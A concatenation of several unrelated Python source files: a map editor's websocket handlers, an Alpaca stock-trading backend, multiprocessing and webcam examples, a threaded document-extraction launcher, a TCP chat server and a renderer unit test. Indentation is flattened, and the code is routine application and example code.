sorted_store_list = sorted(store_list, key=lambda x: x['title'], reverse=False)
emit('store_list', sorted_store_list)
if message['cmd'] == 'load_esdl_from_store':
store_id = message['id']
esh = load_ESDL_EnergySystem(store_id)
if esh:
es = esh.get_energy_system()
if es.name:
title = 'Store name: ' + es.name + ', store id: ' + store_id
else:
title = 'Store id: ' + store_id
set_session('active_es_id', es.id)
set_session('es_filename', title) # TODO: separate filename and title
es_info_list = {}
set_session("es_info_list", es_info_list)
emit('clear_ui')
emit('clear_esdl_layer_list')
call_process_energy_system.submit(esh, None, title)
else:
send_alert('Error loading ESDL file with id {} from store'.format(store_id))
if message['cmd'] == 'import_esdl_from_store':
store_id = message['id']
imported_es = import_ESDL_EnergySystem(store_id)
if imported_es:
if imported_es.name:
title = 'Store name: ' + imported_es.name + ', store id: ' + store_id
else:
title = 'Store id: ' + store_id
esh = get_handler()
call_process_energy_system.submit(esh, None, title) # run in seperate thread
set_session('active_es_id', imported_es.id)
set_session('es_filename', title)
if message['cmd'] == 'store_esdl':
title = message['store_title']
descr = message['store_descr']
email = message['store_email']
tags = ['map']
esh = get_handler()
store_item_metadata = get_session('store_item_metadata')
if store_item_metadata:
store_id = store_item_metadata['id']
update_store_item(store_id, title, descr, email, tags, esh)
else:
store_id = get_session('active_es_id')
create_new_store_item(store_id, title, descr, email, tags, esh)
# Do not store file_content in logging database
if 'file_content' in message:
del message['file_content']
user_email = get_session('user-email')
user_actions_logging.store_logging(user_email, "file-command", message['cmd'], json.dumps(message), "", {})
# if message['cmd'] == 'save_esdl':
# esh = get_handler()
# try:
# write_energysystem_to_file('./static/EnergySystem.esdl', esh)
# # TODO: do we need to flush??
# emit('and_now_press_download_file')
# except Exception as e:
# send_alert('Error saving ESDL file to filesystem - exception: '+str(e))
# if message['cmd'] == 'download_esdl':
# esh = get_handler()
# name = get_session('es_title').replace(' ', '_')
#
# send_ESDL_as_file(esh, name)
# ---------------------------------------------------------------------------------------------------------------------
# Connect from browser
# - initialize energysystem information
# - send info to browser
# ---------------------------------------------------------------------------------------------------------------------
def initialize_app():
session.permanent = True
logger.info('Client connected: {}'.format(request.sid))
if 'client_id' in session:
logger.info('Energysystem in memory - reloading client data')
esh = get_handler()
else:
logger.info('No energysystem in memory - generating empty energysystem')
esh = EnergySystemHandler()
esh.create_empty_energy_system('Untitled EnergySystem', '', 'Untitled Instance', 'Untitled Area',
esdlVersion=esdl_doc.get_esdl_version())
# TODO: discuss how to set active_es_id for the first time after a client connects
es_list = esh.get_energy_systems()
if es_list:
last_es = es_list[-1]
set_session('active_es_id', last_es.id)
else:
logger.error("No energy systems in esh list - Edwin and Ewoud discuss!!")
es_info_list = {}
set_session("es_info_list", es_info_list)
emit('clear_ui')
emit('clear_esdl_layer_list')
call_process_energy_system.submit(esh, None, None) # run in a separate thread
@socketio.on('connect', namespace='/esdl')
def connect():
logger.info("Websocket connection established")
if 'id' in session:
logger.debug('- Old socketio id={}, new socketio id={}'.format(session['id'], request.sid))
else:
logger.debug('- Old socketio id={}, new socketio id={}'.format(None, request.sid))
session['id'] = request.sid
set_session('socketio_sid', request.sid)
# Client ID is used to retrieve session variables in handler_manager
# So this is a very important session variable!!
if 'client_id' in session:
logger.debug('- Client id: {}'.format(session['client_id']))
else:
logger.debug('- No client id in session')
if not valid_session():
send_alert("Session has timed out, please refresh")
def get_qau_information():
qau_info = dict()
qau_info['generic'] = ESDLQuantityAndUnits.get_qau_information()
qau_info['profile_type_enum_values'] = ESDLQuantityAndUnits.get_profile_type_enum_values()
qau_info['predefined_qau'] = esdl_config.esdl_config['predefined_quantity_and_units']
return qau_info
def get_carrier_color_dict():
me_settings = MapEditorSettings.get_instance()
me_ui_setting = me_settings.get_system_setting(MAPEDITOR_UI_SETTINGS)
if me_ui_setting:
if 'carrier_colors' in me_ui_setting:
return me_ui_setting['carrier_colors']
return None
@socketio.on('initialize', namespace='/esdl')
def browser_initialize():
user_email = get_session('user-email')
role = get_session('user-role')
view_modes = ViewModes.get_instance()
view_modes.initialize_user(user_email)
me_settings = MapEditorSettings.get_instance()
user_settings = me_settings.get_user_settings(user_email)
set_session('user_settings', user_settings)
logger.info('Send initial information to client')
emit('user_settings', user_settings)
emit('control_strategy_config', esdl_config.esdl_config['control_strategies'])
emit('carrier_color_dict', get_carrier_color_dict())
emit('wms_layer_list', wms_layers.get_layers())
emit('cap_pot_list', ESDLAsset.get_objects_list())
emit('qau_information', get_qau_information())
emit('esdl_services', esdl_services.get_user_services_list(user_email, role))
emit('user_info', {'email': user_email})
initialize_app()
# ---------------------------------------------------------------------------------------------------------------------
# Disconnect
# ---------------------------------------------------------------------------------------------------------------------
@socketio.on('disconnect', namespace='/esdl')
def on_disconnect():
logger.info('Client disconnected: {}'.format(request.sid))
# ---------------------------------------------------------------------------------------------------------------------
# Error logging
# ---------------------------------------------------------------------------------------------------------------------
@socketio.on_error_default
def default_error_handler(e):
logger.error('Error in SocketIO handler: '+str(e))
import traceback
logger.error('Socket IO message: {}'.format(request.event["message"])) # "my error event"
logger.error('Socket IO arguments: {}'.format(request.event["args"]))
traceback.print_exc()
# ---------------------------------------------------------------------------------------------------------------------
# Start application
# ---------------------------------------------------------------------------------------------------------------------
if __name__ == '__main__':
parse_esdl_config()
logger.info("Starting ESDL MapEditor application")
user_actions_logging.store_logging("System", "application start", "", "", "", {})
socketio.run(app, debug=settings.FLASK_DEBUG, host=settings.FLASK_SERVER_HOST, port=settings.FLASK_SERVER_PORT, use_reloader=True)
|
alpaca.py
|
#
# Copyright 2018 Alpaca
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import alpaca_trade_api as tradeapi
from alpaca_trade_api.rest import APIError
from alpaca_trade_api.entity import Order
from requests.exceptions import HTTPError
import numpy as np
import pandas as pd
from trading_calendars import (
get_calendar,
register_calendar_alias,
)
from trading_calendars.calendar_utils import (
global_calendar_dispatcher as default_calendar,
)
from datetime import timedelta
import uuid
from .base import BaseBackend
from pylivetrader.api import symbol as symbol_lookup
from pylivetrader.misc.api_context import set_context
import pylivetrader.protocol as zp
from pylivetrader.finance.order import (
Order as ZPOrder,
ORDER_STATUS as ZP_ORDER_STATUS,
)
from pylivetrader.finance.execution import (
MarketOrder,
LimitOrder,
StopOrder,
StopLimitOrder,
)
from pylivetrader.misc.pd_utils import normalize_date
from pylivetrader.misc.parallel_utils import parallelize
from pylivetrader.errors import SymbolNotFound
from pylivetrader.assets import Equity
from logbook import Logger
from threading import Thread
import asyncio
log = Logger('Alpaca')
NY = 'America/New_York'
end_offset = pd.Timedelta('1000 days')
one_day_offset = pd.Timedelta('1 day')
def skip_http_error(statuses):
'''
A decorator to wrap with try..except to swallow
specific HTTP errors.
@skip_http_error((404, 503))
def fetch():
...
'''
assert isinstance(statuses, tuple)
def decorator(func):
def wrapper(*args, **kwargs):
try:
return func(*args, **kwargs)
except HTTPError as e:
status_code = e.response.status_code
if status_code in statuses:
log.warn(str(e))
else:
raise
return wrapper
return decorator
class Backend(BaseBackend):
def __init__(
self,
key_id=None,
secret=None,
base_url=None,
api_version='v2'
):
self._key_id = key_id
self._secret = secret
self._base_url = base_url
self._api = tradeapi.REST(
key_id, secret, base_url, api_version=api_version
)
self._cal = get_calendar('NYSE')
self._open_orders = {}
self._orders_pending_submission = {}
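# _open_orders caches orders by client_order_id and is kept in sync by the
# trade_updates stream; _orders_pending_submission holds follow-up orders
# that wait for a flattening fill before being submitted (see order()).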
def initialize_data(self, context):
# Open a websocket stream to get updates in real time
stream_process = Thread(
target=self._get_stream, daemon=True, args=(context,)
)
stream_process.start()
# Load all open orders
existing_orders = self.all_orders(status='open', initialize=True)
for k, v in existing_orders.items():
if self._open_orders.get(k) is not None:
self._open_orders[k] += v
else:
self._open_orders[k] = v
def _get_stream(self, context):
set_context(context)
asyncio.set_event_loop(asyncio.new_event_loop())
conn = tradeapi.StreamConn(self._key_id, self._secret, self._base_url)
channels = ['trade_updates']
@conn.on(r'trade_updates')
async def handle_trade_update(conn, channel, data):
# Check for any pending orders
waiting_order = self._orders_pending_submission.get(
data.order['client_order_id']
)
if waiting_order is not None:
if data.event == 'fill':
# Submit the waiting order
self.order(*waiting_order)
self._orders_pending_submission.pop(
data.order['client_order_id'], None
)
elif data.event in ['canceled', 'rejected']:
# Remove the waiting order
self._orders_pending_submission.pop(
data.order['client_order_id'], None
)
if data.event in ['canceled', 'rejected', 'fill']:
self._open_orders.pop(data.order['client_order_id'], None)
else:
self._open_orders[data.order['client_order_id']] = (
self._order2zp(Order(data.order))
)
conn.run(channels)
def _symbols2assets(self, symbols):
'''
Utility for debug/testing
'''
assets = {a.symbol: a for a in self.get_equities()}
return [assets[symbol] for symbol in symbols if symbol in assets]
def get_equities(self):
assets = []
t = normalize_date(pd.Timestamp('now', tz=NY))
raw_assets = self._api.list_assets(asset_class='us_equity')
for raw_asset in raw_assets:
asset = Equity(
raw_asset.id, raw_asset.exchange,
symbol=raw_asset.symbol,
asset_name=raw_asset.symbol,
)
asset.start_date = t - one_day_offset
if raw_asset.status == 'active' and raw_asset.tradable:
asset.end_date = t + end_offset
else:
# if asset is not tradable, set end_date = day before
asset.end_date = t - one_day_offset
asset.auto_close_date = asset.end_date
assets.append(asset)
# register every unseen exchange name as an
# alias of NYSE (e.g. AMEX, ARCA, NYSEARCA)
if not default_calendar.has_calendar(raw_asset.exchange):
register_calendar_alias(raw_asset.exchange,
'NYSE', force=True)
return assets
@property
def positions(self):
z_positions = zp.Positions()
positions = self._api.list_positions()
position_map = {}
symbols = []
for pos in positions:
symbol = pos.symbol
try:
z_position = zp.Position(symbol_lookup(symbol))
except SymbolNotFound:
continue
z_position.amount = int(pos.qty)
z_position.cost_basis = float(pos.cost_basis) / float(pos.qty)
z_position.last_sale_price = None
z_position.last_sale_date = None
z_positions[symbol_lookup(symbol)] = z_position
symbols.append(symbol)
position_map[symbol] = z_position
trades = self._symbol_trades(symbols)
for symbol, trade in trades.items():
z_position = position_map[symbol]
if trade is None:
z_position.last_sale_price = np.nan
z_position.last_sale_date = pd.NaT
else:
z_position.last_sale_price = float(trade.price)
z_position.last_sale_date = trade.timestamp
return z_positions
@property
def portfolio(self):
account = self._api.get_account()
z_portfolio = zp.Portfolio()
z_portfolio.cash = float(account.cash)
z_portfolio.positions = self.positions
z_portfolio.positions_value = float(
account.portfolio_value) - float(account.cash)
z_portfolio.portfolio_value = float(account.portfolio_value)
return z_portfolio
@property
def account(self):
account = self._api.get_account()
z_account = zp.Account()
z_account.buying_power = float(account.buying_power)
z_account.total_position_value = float(
account.portfolio_value) - float(account.cash)
return z_account
def _order2zp(self, order):
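# map an Alpaca Order entity onto a pylivetrader order: amount is signed
# (negative for sells) and the Alpaca client_order_id becomes the order id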
zp_order = ZPOrder(
id=order.client_order_id,
asset=symbol_lookup(order.symbol),
amount=int(order.qty) if order.side == 'buy' else -int(order.qty),
stop=float(order.stop_price) if order.stop_price else None,
limit=float(order.limit_price) if order.limit_price else None,
dt=order.submitted_at,
commission=0,
)
zp_order._status = ZP_ORDER_STATUS.OPEN
if order.canceled_at:
zp_order._status = ZP_ORDER_STATUS.CANCELLED
if order.failed_at:
zp_order._status = ZP_ORDER_STATUS.REJECTED
if order.filled_at:
zp_order._status = ZP_ORDER_STATUS.FILLED
zp_order.filled = int(order.filled_qty)
return zp_order
def _new_order_id(self):
return uuid.uuid4().hex
def batch_order(self, args):
return [self.order(*order) for order in args]
def order(self, asset, amount, style, quantopian_compatible=True):
symbol = asset.symbol
zp_order_id = self._new_order_id()
if quantopian_compatible:
current_position = self.positions[asset]
if (
abs(amount) > abs(current_position.amount) and
amount * current_position.amount < 0
):
# The order would take us from a long position to a short
# position or vice versa and needs to be broken up
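# Hypothetical example: holding +10 shares, order(asset, -15, style) sells
# 10 now to flatten the position and queues the remaining -5 until the
# fill confirmation arrives on the trade_updates stream.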
self._orders_pending_submission[zp_order_id] = (
asset,
amount + current_position.amount,
style
)
amount = -1 * current_position.amount
qty = amount if amount > 0 else -amount
side = 'buy' if amount > 0 else 'sell'
order_type = 'market'
if isinstance(style, MarketOrder):
order_type = 'market'
elif isinstance(style, LimitOrder):
order_type = 'limit'
elif isinstance(style, StopOrder):
order_type = 'stop'
elif isinstance(style, StopLimitOrder):
order_type = 'stop_limit'
limit_price = style.get_limit_price(side == 'buy') or None
stop_price = style.get_stop_price(side == 'buy') or None
log.debug(
('submitting {} order for {} - '
'qty:{}, side:{}, limit_price:{}, stop_price:{}').format(
order_type,
symbol,
qty,
side,
limit_price,
stop_price
)
)
try:
order = self._api.submit_order(
symbol=symbol,
qty=qty,
side=side,
type=order_type,
time_in_force='day',
limit_price=limit_price,
stop_price=stop_price,
client_order_id=zp_order_id,
)
zp_order = self._order2zp(order)
self._open_orders[zp_order_id] = zp_order
return zp_order
except APIError as e:
log.warning('order for symbol {} is rejected {}'.format(
symbol,
e
))
return None
@property
def orders(self):
return {
o.client_order_id: self._order2zp(o)
for o in self._api.list_orders('all')
}
def get_order(self, zp_order_id):
order = None
try:
order = self._open_orders[zp_order_id]
except Exception:
# Order was not found in our open order list, may be closed
order = self._order2zp(
self._api.get_order_by_client_order_id(zp_order_id))
return order
def all_orders(
self,
before=None,
status='all',
days_back=None,
initialize=False):
# Check if the open order list is being asked for
if (not initialize and status == 'open'
and before is None and days_back is None):
return self._open_orders
# Get all orders submitted days_back days before `before` or now.
now = pd.Timestamp.utcnow()
start = now.isoformat() if before is None else before.isoformat()
# A session label refers to the market date that an order submitted
# at a given minute would be executed on. We'll need to keep track of
# this if the function is bounded by days_back.
start_session_label = self._cal.minute_to_session_label(now)
reached_end_date = False
all_orders = {}
batch_size = 500
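# page backwards through the order history: each batch uses the submission
# time of its oldest order as the next 'until' cursor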
orders = self._api.list_orders(status, batch_size, until=start)
while len(orders) > 0 and not reached_end_date:
batch_orders = {}
for order in orders:
if days_back is not None:
# Verify that the order is not too old.
# `session_distance()` ignores holidays and weekends.
days_since_order = self._cal.session_distance(
self._cal.minute_to_session_label(order.submitted_at),
start_session_label
)
if days_since_order > days_back:
reached_end_date = True
break
batch_orders[order.client_order_id] = self._order2zp(order)
all_orders.update(batch_orders)
if not reached_end_date:
# Get the timestamp of the earliest order in the batch.
until = pd.Timestamp(orders[-1].submitted_at).isoformat()
orders = self._api.list_orders(status, batch_size, until=until)
return all_orders
def cancel_order(self, zp_order_id):
try:
order = self._api.get_order_by_client_order_id(zp_order_id)
self._api.cancel_order(order.id)
except Exception as e:
print('Error: Could not cancel order {}'.format(zp_order_id))
log.error(e)
return
def get_last_traded_dt(self, asset):
trade = self._api.polygon.last_trade(asset.symbol)
return trade.timestamp
def get_spot_value(
self,
assets,
field,
dt,
date_frequency,
quantopian_compatible=True):
assert(field in (
'open', 'high', 'low', 'close', 'volume', 'price', 'last_traded'))
assets_is_scalar = not isinstance(assets, (list, set, tuple))
if assets_is_scalar:
symbols = [assets.symbol]
else:
symbols = [asset.symbol for asset in assets]
if field == 'last_traded' or \
not quantopian_compatible and field == 'price':
results = self._get_spot_trade(symbols, field)
else:
results = self._get_spot_bars(symbols, field)
return results[0] if assets_is_scalar else results
def _get_spot_trade(self, symbols, field):
assert(field in ('price', 'last_traded'))
symbol_trades = self._symbol_trades(symbols)
def get_for_symbol(symbol_trades, symbol):
trade = symbol_trades.get(symbol)
if field == 'price':
if trade is None:
return np.nan
return trade.price
else:
if trade is None:
return pd.NaT
return trade.timestamp
return [get_for_symbol(symbol_trades, symbol) for symbol in symbols]
def _get_spot_bars(self, symbols, field):
symbol_bars = self._symbol_bars(symbols, 'minute', limit=1)
def get_for_symbol(symbol_bars, symbol, field):
bars = symbol_bars.get(symbol)
if bars is None or len(bars) == 0:
return np.nan
return bars[field].values[-1]
ohlcv_field = 'close' if field == 'price' else field
results = [
get_for_symbol(symbol_bars, symbol, ohlcv_field)
for symbol in symbols
]
return results
def get_bars(self, assets, data_frequency, bar_count=500):
'''
Interface method.
Return: pd.Dataframe() with columns MultiIndex [asset -> OHLCV]
'''
assets_is_scalar = not isinstance(assets, (list, set, tuple))
is_daily = 'd' in data_frequency # 'daily' or '1d'
if assets_is_scalar:
symbols = [assets.symbol]
else:
symbols = [asset.symbol for asset in assets]
symbol_bars = self._symbol_bars(
symbols, 'day' if is_daily else 'minute', limit=bar_count)
if is_daily:
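# the daily feed may not yet contain the current (still open) session, so
# build today's bar from minute data and append it below when it is missing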
intra_bars = {}
symbol_bars_minute = self._symbol_bars(
symbols, 'minute', limit=1000)
for symbol, df in symbol_bars_minute.items():
agged = df.resample('1D').agg(dict(
open='first',
high='max',
low='min',
close='last',
volume='sum',
)).dropna()
intra_bars[symbol] = agged
dfs = []
for asset in assets if not assets_is_scalar else [assets]:
symbol = asset.symbol
df = symbol_bars.get(symbol)
if df is None:
dfs.append(pd.DataFrame(
[], columns=[
'open', 'high', 'low', 'close', 'volume']
))
continue
if is_daily:
agged = intra_bars.get(symbol)
if agged is not None and len(
agged.index) > 0 and agged.index[-1] not in df.index:
if not (agged.index[-1] > df.index[-1]):
log.warn(
('agged.index[-1] = {}, df.index[-1] = {} '
'for {}').format(
agged.index[-1], df.index[-1], symbol))
df = df.append(agged.iloc[-1])
df.columns = pd.MultiIndex.from_product([[asset, ], df.columns])
dfs.append(df)
return pd.concat(dfs, axis=1)
def _symbol_bars(
self,
symbols,
size,
_from=None,
to=None,
limit=None):
'''
Query historic_agg either minute or day in parallel
for multiple symbols, and return in dict.
symbols: list[str]
size: str ('day', 'minute')
_from: str or pd.Timestamp
to: str or pd.Timestamp
limit: str or int
return: dict[str -> pd.DataFrame]
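e.g. (illustrative) _symbol_bars(['AAPL'], 'minute', limit=5)
-> {'AAPL': DataFrame of the last 5 minute bars}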
'''
assert size in ('day', 'minute')
if not (_from or to):
to = pd.to_datetime('now', utc=True).tz_convert('America/New_York')
if not (_from and to) and limit:
# temporary workaround: fetch extra bars, since masking to
# market hours reduces the number of bars returned
query_limit = limit
if query_limit is not None:
query_limit *= 2
if _from:
if size == 'day':
to = _from + timedelta(days=query_limit+1)
else:
to = _from + timedelta(minutes=query_limit+1)
else:
if size == 'day':
_from = to - timedelta(days=query_limit+1)
else:
_from = to - timedelta(minutes=query_limit+1)
@skip_http_error((404, 504))
def fetch(symbol):
df = self._api.polygon.historic_agg_v2(
symbol, 1, size,
int(_from.timestamp()) * 1000,
int(to.timestamp()) * 1000
).df
# rename Polygon's v2 agg fields to match their full titles
df = df.rename(index=str, columns={
't': 'timestamp',
'o': 'open',
'h': 'high',
'l': 'low',
'c': 'close',
'v': 'volume'
})
# convert timestamps to datetimes
# astype is necessary to deal with empty result
df.index = pd.to_datetime(
df.index.astype('str'),
utc=True,
).tz_convert('America/New_York')
df.index.name = 'timestamp'
# zipline expects right-labelled bars, while the API returns
# left-labelled bars (beginning of bucket), so shift minute bars by one minute
if size == 'minute':
df.index += pd.Timedelta('1min')
if not df.empty:
# mask out bars outside market hours
mask = self._cal.minutes_in_range(
df.index[0], df.index[-1],
).tz_convert(NY)
df = df.reindex(mask)
if limit is not None:
df = df.iloc[-limit:]
return df
return parallelize(fetch)(symbols)
def _symbol_trades(self, symbols):
'''
Query last_trade in parallel for multiple symbols and
return in dict.
symbols: list[str]
return: dict[str -> polygon.Trade]
'''
@skip_http_error((404, 504))
def fetch(symbol):
return self._api.polygon.last_trade(symbol)
return parallelize(fetch)(symbols)
|
ex2_lock.py
|
import multiprocessing
# python -m timeit -s "import ex2_lock" "ex2_lock.run_workers()"
# 19ms using lock.acquire
# 21ms using with lock
def work(value, max_count, lock):
for n in range(max_count):
with lock:
value.value += 1
#lock.acquire()
#value.value += 1
#lock.release()
def run_workers():
NBR_PROCESSES = 4
MAX_COUNT_PER_PROCESS = 1000
total_expected_count = NBR_PROCESSES * MAX_COUNT_PER_PROCESS
processes = []
lock = multiprocessing.Lock()
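# a single shared Lock serialises the increments of the shared Value across processes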
value = multiprocessing.Value('i', 0)
for process_nbr in range(NBR_PROCESSES):
p = multiprocessing.Process(target=work, args=(value, MAX_COUNT_PER_PROCESS, lock))
p.start()
processes.append(p)
# wait for the processes to finish
for p in processes:
p.join()
# print the final value
print("Expecting to see a count of {}".format(total_expected_count))
print("We have counted to {}".format(value.value))
if __name__ == "__main__":
run_workers()
|
webcam.py
|
import numpy as np
import cv2
import time
from multiprocessing import Process, Queue, Value
class Webcam(object):
def __init__(self, camera_num=0):
self.cap = cv2.VideoCapture(camera_num)
self.current_frame = None
self.ret = None
self.is_running = Value('i',1)
self.q = Queue(maxsize=2)
self.vp = Process(target=self._update_frame, args=(self.q,self.is_running,))
self.vp.daemon = True
# the frame capture loop runs in a separate process (started via start())
def start(self):
self.vp.start()
def quit(self):
print('webcam closing...')
self.is_running.value = 0
self.vp.join(timeout=5)
# process function
def _update_frame(self, q, is_running):
while is_running.value == 1:
self.ret, self.current_frame = self.cap.read()
if self.ret is True:
#self.current_frame= self.cap.read()[1]
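# keep only the most recent frames: if the queue is full, drop the oldest before putting the new one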
if q.full():
old_frame = q.get()
q.put(self.current_frame)
print('q.size: ', q.qsize())
time.sleep(0.005)
# get the current frame
def get_current_frame(self):
img = None
while not self.q.empty(): # get last available image
img = self.q.get()
return img
|
docxtractor_threads.py
|
import os
import docxtractor as dxtr
import Models.ImportModel as IM
import threading
import math
import sys
import subprocess
import datetime
def call_exe(start_index, end_index):
# build the command as an argument list so the script path is joined portably
command = [sys.executable, os.path.join(os.getcwd(), "docxtractor_thread_exe.py"), str(start_index), str(end_index)]
print(command)
x = subprocess.run(command, capture_output=True)
print(x)
def main():
# import spreadsheet object of researcher data
#org_sheet = IM.scrape6()
start_time = datetime.datetime.now()
print("start time:", start_time)
start_num = 25001
end_num = 27229
per_thread = 500
num_threads = 7
max_thread_count = math.ceil((end_num - start_num + 1) / per_thread)
if num_threads > max_thread_count:
num_threads = max_thread_count
print("WE SET THE MAX NUM THREADS TO", num_threads)
# split the work into chunks of per_thread records, one thread per chunk,
# then run the threads in groups
threads = []
for i in range(0, max_thread_count):
start_index = (start_num - 1) + per_thread * i
end_index = (start_num - 1) + per_thread * (i+1)
if i == (max_thread_count - 1):
end_index = end_num
t = threading.Thread(target=call_exe, args=(start_index, end_index))
t.daemon = True
threads.append(t)
start_thread = 0
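# run the threads in groups of num_threads, joining each group before starting the next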
while True:
end_thread = start_thread + num_threads
if end_thread >= max_thread_count:
end_thread = max_thread_count
for t in threads[start_thread:end_thread]:
t.start()
for t in threads[start_thread:end_thread]:
t.join()
start_thread = start_thread + num_threads
if end_thread == max_thread_count:
break
end_time = datetime.datetime.now()
diff = end_time-start_time
minutes = diff.total_seconds() / 60
seconds = diff.total_seconds() % 60
print("start_time:", start_time)
print("end time:", end_time)
print(f"time taken: {math.floor(minutes)} minutes and {math.floor(seconds)} seconds." )
if __name__ == "__main__":
main()
|
server.py
|
import socket
from threading import Thread
#server's ip address
SERVER_HOST = "0.0.0.0"
SERVER_PORT = 5002 #port we want to use
separator_token = "<SEP>" # we will use this to separate the client name & message
#initialize set/list of all connected client's sockets
client_sockets = set()
#create a TCP socket
s = socket.socket()
#make the port as reusable
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
#bind the socket to the address we specified
s.bind((SERVER_HOST, SERVER_PORT))
#listen for upcoming connections
s.listen(5)
print(f"[*] Listening as {SERVER_HOST}:{SERVER_PORT}")
def listen_for_client(cs):
"""
This function keeps listening for a message from the 'cs' socket. Whenever a message
is received, broadcast it to all other connected clients.
"""
while True:
try:
#keep listening for a message from 'cs' socket
msg = cs.recv(1024).decode()
except Exception as e:
#client no longer connected
#remove it from the set
print(f"[!] Error: {e}")
client_sockets.remove(cs)
break # stop listening on this socket once the client has disconnected
else:
#if we received a message, replace the <SEP>
#token with ": " for nice printing
msg = msg.replace(separator_token, ": ")
#iterate over all connected sockets
for client_socket in client_sockets:
#and send the message
client_socket.send(msg.encode())
while True:
#we keep listening for new connections all the time
client_socket, client_address = s.accept()
print(f"[+] {client_address} connected.")
#add the new connected client to connected sockets
client_sockets.add(client_socket)
#start a new thread that listens for each client's messages
t = Thread(target=listen_for_client, args=(client_socket,))
#make the thread daemon so it ends whenever the main thread ends
t.daemon = True
#start the thread
t.start()
#close client sockets
for cs in client_sockets:
cs.close()
#close server socket
s.close()
|
SXRendererTest.py
|
##########################################################################
#
# Copyright (c) 2011, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# * Neither the name of Image Engine Design nor the names of any
# other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
from __future__ import with_statement
import unittest
import os
import sys
import threading
import IECore
import IECoreRI
class SXRendererTest( unittest.TestCase ) :
def __loadImage( self, fileName ) :
i = IECore.Reader.create( fileName ).read()
r = i["R"].data
g = i["G"].data
b = i["B"].data
result = IECore.V3fVectorData()
v = IECore.V3f
for i in range( 0, len( r ) ) :
result.append( v( r[i], g[i], b[i] ) )
return result
def __saveImage( self, data, dataWindow, fileName ) :
image = IECore.ImagePrimitive( dataWindow, dataWindow )
if isinstance( data, IECore.FloatVectorData ) :
image["R"] = IECore.PrimitiveVariable( IECore.PrimitiveVariable.Interpolation.Vertex, data )
image["G"] = IECore.PrimitiveVariable( IECore.PrimitiveVariable.Interpolation.Vertex, data )
image["B"] = IECore.PrimitiveVariable( IECore.PrimitiveVariable.Interpolation.Vertex, data )
else :
r = IECore.FloatVectorData()
g = IECore.FloatVectorData()
b = IECore.FloatVectorData()
for c in data :
r.append( c[0] )
g.append( c[1] )
b.append( c[2] )
image["R"] = IECore.PrimitiveVariable( IECore.PrimitiveVariable.Interpolation.Vertex, r )
image["G"] = IECore.PrimitiveVariable( IECore.PrimitiveVariable.Interpolation.Vertex, g )
image["B"] = IECore.PrimitiveVariable( IECore.PrimitiveVariable.Interpolation.Vertex, b )
IECore.Writer.create( image, fileName ).write()
def __rectanglePoints( self, box ) :
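# build per-point primitive variables (P, N, Ng, I, dPdu, dPdv, s, t) for a flat rectangle of shading points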
p = IECore.V3fVectorData()
n = IECore.V3fVectorData()
i = IECore.V3fVectorData()
dPdu = IECore.V3fVectorData()
dPdv = IECore.V3fVectorData()
s = IECore.FloatVectorData()
t = IECore.FloatVectorData()
for y in range( box.min.y, box.max.y + 1 ) :
for x in range( box.min.x, box.max.x + 1 ) :
p.append( IECore.V3f( x, y, 0 ) )
n.append( IECore.V3f( 0, 0, 1 ) )
i.append( IECore.V3f( 0, 0, -1 ) )
dPdu.append( IECore.V3f( 2, 0, 0 ) )
dPdv.append( IECore.V3f( 0, 2, 0 ) )
s.append( float( x ) / box.size().x )
t.append( float( y ) / box.size().y )
return IECore.CompoundData( {
"P" : p,
"N" : n,
"Ng" : n,
"I" : i,
"dPdu" : dPdu,
"dPdv" : dPdv,
"s" : s,
"t" : t,
} )
def __assertVectorDataAlmostEqual( self, data1, data2 ) :
self.assertEqual( len( data1 ), len( data2 ) )
self.assertEqual( data1.typeName(), data2.typeName() )
if isinstance( data1, IECore.Color3fVectorData ) :
for i in range( 0, len( data1 ) ) :
self.failUnless( data1[i].equalWithAbsError( data2[i], 0.000001 ) )
else :
for i in range( 0, len( data1 ) ) :
self.assertAlmostEqual( data1[i], data2[i], 6 )
def test( self ) :
r = IECoreRI.SXRenderer()
points = IECore.CompoundData( {
"N" : self.__loadImage( "test/IECoreRI/data/sxInput/cowN.exr" ),
"Ng" : self.__loadImage( "test/IECoreRI/data/sxInput/cowN.exr" ),
"P" : self.__loadImage( "test/IECoreRI/data/sxInput/cowP.exr" ),
"I" : self.__loadImage( "test/IECoreRI/data/sxInput/cowI.exr" ),
} )
self.assertEqual( os.system( "shaderdl -o test/IECoreRI/shaders/sxTest.sdl test/IECoreRI/shaders/sxTest.sl" ), 0 )
r.shader( "surface", "test/IECoreRI/shaders/sxTest.sdl", { "noiseFrequency" : 1.0, "tint" : IECore.Color3f( 1 ) } )
s = r.shade( points )
self.assertEqual( len( s ), 6 )
self.failUnless( "outputFloat" in s )
self.failUnless( "outputColor" in s )
self.failUnless( "Ci" in s )
self.failUnless( "Oi" in s )
self.failUnless( "P" in s )
self.failUnless( "N" in s )
